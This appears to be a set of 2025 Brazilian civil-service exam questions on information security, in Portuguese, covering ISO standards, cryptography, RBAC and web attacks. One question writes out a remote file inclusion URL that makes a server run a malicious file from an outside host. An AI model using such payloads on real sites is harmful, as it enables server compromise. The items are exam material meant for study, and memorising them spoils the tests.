Segurança da Informação Ataques e ameaças
Ano: 2025
Banca: FCPC
Durante a realização de testes de invasão em uma aplicação Web, um analista encontrou um vetor de ataque para uma travessia de diretórios. Marque a alternativa que possui um payload válido para este ataque.
Segurança da Informação Norma 27005
Ano: 2025
Banca: FCPC
De acordo com a ABNT NBR ISO/IEC 27005:2023, “a utilidade de categorizar controles como preventivos, detectivos e corretivos reside em seu uso, para assegurar que a construção de planos de tratamento de riscos sejam resilientes a falhas nos controles.” Considerando uma seleção apropriada de controles preventivos, detectivos e corretivos, assinale a alternativa correta.
Segurança da Informação Criptografia
Ano: 2025
Banca: Fundação Getúlio Vargas (FGV)
Os algoritmos simétricos e assimétricos desempenham um papel fundamental na proteção de dados em processos de criptografia. Os algoritmos RSA, Diffie-Hellman, AES e RC4 são comumente utilizados para garantir segurança em várias aplicações.
Nesse sentido, assinale a opção que indica um exemplo de criptografia simétrica segura e amplamente recomendada nos padrões modernos, que utiliza a mesma chave para criptografar e descriptografar dados.
Segurança da Informação Criptografia
Ano: 2025
Banca: SELECON
Uma empresa financeira, para aumentar a segurança de suas transações, adotou um método de criptografia assimétrica, baseado nas propriedades matemáticas de curvas elípticas sobre campos finitos, que oferece maior segurança por aplicar comprimentos de chaves mais curtos, usando cálculos mais rápidos e menor consumo de energia. Esse método é o:
Segurança da Informação ISO 27002
Ano: 2025
Banca: SELECON
Uma empresa de TI, aplicando a norma ISO 27002, focada em controles de segurança da informação, está, no momento, utilizando a diretriz de segurança das operações e das comunicações. Isso significa que ela está trabalhando com:
Segurança da Informação Controles de segurança
Ano: 2025
Banca: Fundação Getúlio Vargas (FGV)
O Controle de Acesso Baseado em Funções (RBAC) é um modelo amplamente utilizado para gerenciar permissões de acesso em ambientes organizacionais.
Assinale a afirmativa correta acerca do funcionamento do RBAC.
Segurança da Informação Criptografia
Ano: 2025
Banca: Fundação Getúlio Vargas (FGV)
A criptografia dos dados em diferentes estados vem sendo utilizada tanto para garantir a segurança quanto para prevenir possíveis vazamentos de informações sensíveis.
No contexto de segurança de banco de dados, avalie as afirmativas a seguir.

I. O protocolo HTTPS, bem como outros similares, tem se tornado default para APIs na nuvem modernas.
II. Criptografia de disco completo em laptops são essenciais para proteger dados em caso de roubo do dispositivo.
III. Todas as formas de dados armazenados, incluindo dados em servidores, sistemas de arquivos, bancos de dados e armazenamento em nuvem, devem ser criptografadas para proteger contra acessos não autorizados.

Acerca do estado dos dados nas três afirmativas, é correto afirmar que ...
Segurança da Informação Criptografia
Ano: 2025
Banca: Fundação Getúlio Vargas (FGV)
Durante uma auditoria no setor de TI de TCE-RR, foi constatado que os analistas estavam utilizando criptografia por chave pública para o envio de informações confidenciais. Para garantir que os dados sejam protegidos contra acessos não autorizados, cada servidor precisa configurar corretamente as chaves de criptografia antes de iniciar a troca de mensagens.
Com base no funcionamento da criptografia assimétrica, sobre o processo de envio de uma mensagem criptografada é correto afirmar que
Segurança da Informação Análise de Vulnerabilidade e Gestão de Riscos
Ano: 2025
Banca: Fundação Getúlio Vargas (FGV)
A página web da sociedade empresária Exemplo1234, disponível na internet, permite que internautas acessem o edital de uma vaga de trabalho por meio do endereço eletrônico http://empresa1234.com/vaga.php?file=vaga.pdf.
Durante a verificação de vulnerabilidades contratada por essa empresa, foi observado que o servidor da página web da Empresa1234 processava o valor fornecido no parâmetro file sem realizar validação ou sanitização adequada.
Como resultado, foi possível incluir e executar no servidor o conteúdo de um arquivo malicioso hospedado no endereço http://testevulnerabilidade.com/badpage.php
O teste foi realizado utilizando o seguinte endereço:
http://empresa1234.com/vaga.php?file=http://testevulnerabilida de.com/badpage.php
Ao acessar ...
Segurança da Informação ISO 27002
Ano: 2025
Banca: FUNDATEC Processos Seletivos (FUNDATEC)
Segundo a Norma ISO/IEC 27002:2013, são controles relacionados à gestão de ativos, EXCETO: